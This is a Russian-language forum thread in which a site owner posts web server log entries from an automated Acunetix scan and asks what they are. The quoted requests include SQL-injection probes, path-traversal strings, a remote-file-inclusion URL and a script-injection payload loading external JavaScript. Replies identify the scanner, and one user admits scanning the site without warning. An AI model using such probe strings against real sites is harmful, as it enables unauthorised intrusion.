про запросы на сайт и их выполнение

  • Автор темы Kauperwood
  • Дата начала
K

Kauperwood

#1
Такие вот разные запросы получил на сервер, :

index.php?mm='%20force_sql_error&yy=2006
/acunetix-wvs-test-for-some-inexistent-file-second-try
/validator.php?OTUzOTIy%40
/index.php?wiki=../passwd.php
/index.php?paged=-1
/includes/functions.php?phpbb_root_path=http://test.acunetix.com/acunetix_not_execute?
/?&login
/index.php?template=../../../../../../../../../../boot.ini%00
/validator.php?OTUzOTIy%40
/acunetix-wvs-test-for-some-inexistent-file-second-try
/xampp/phonebook.php?lastname='
/syntaxhighlighter/scripts/1%3CScRiPt/acu%20src=http://testphp.vulnweb.com/xss.js?911293%3E%3C/ScRiPt%3E

некоторые из тех что отобразились.

а остальные?
всего запросов с этого адреса :4262

у меня на сайте ничего ценного вроде и нет, но
много запросов, что за способ не пойму, может кто пояснить про количество, - на предмет чего, может быть сделано столько запросов за короткий промежуток времени?
 

vital

Больной Компом Детектед
29.01.2006
2 432
33
#2
Ну кто-то пытался сломать твой сайт, каким-то автоматическим тестировщиком по типу w3af.
Тупо подставляли в урл всякие различные запросы на различные примитивные уязвимости. Школьники балуются. Не парься.
 

EmptyR

Веб мастер
06.10.2010
164
0
#3
Эм... Ребята, а почему про меня все позабыли?!!! :KillMe: Не удивлюсь, если это сайт okrasim.ru, или как его там... Я плановый тест проводил не так давно... И это ничто иное как acunetix web vulnarability scanner + xpider + ещё парочка малоизвестных прог. :happy: . Это учитывая то, что я понаходил программок с десяток + набор статей по базовым понятиям взлома.
Кстати Acunetix - прога иногда годная в плане "повесить сайт с жёстким ограничением ЦПУ".

Сразу прошу учитывать, что если находите какие то попытки атак на сайт после того, как в форуме кидали ссылку на сайт, то не факт что кто то вас ломает в реальности. Вспомните про старика EmptyR. -_-

P.S.: Я слежу за вами... :)
 
K

Kauperwood

#4
Опа, привет медвед :KillMe:

ну ты же предупреждай если планируешь тестировать что та, оглашай хоть когда, откда же я буду знать что это ты, иначе я не роспознаю тебя, так как телепатической и мобильной связи у нас нету)

Добавлено:
"повесить сайт с жёстким ограничением ЦПУ"
в смысле "повесить"?

потом шутя, если кто то нас ломает в виртуальности почему это не значит что это происходит не в реальности? как по мне так все как раз в самой той реальности..))
назначай даты своих эксперементов старик EmptyR, на измене сижу когда не в курсе что происходит))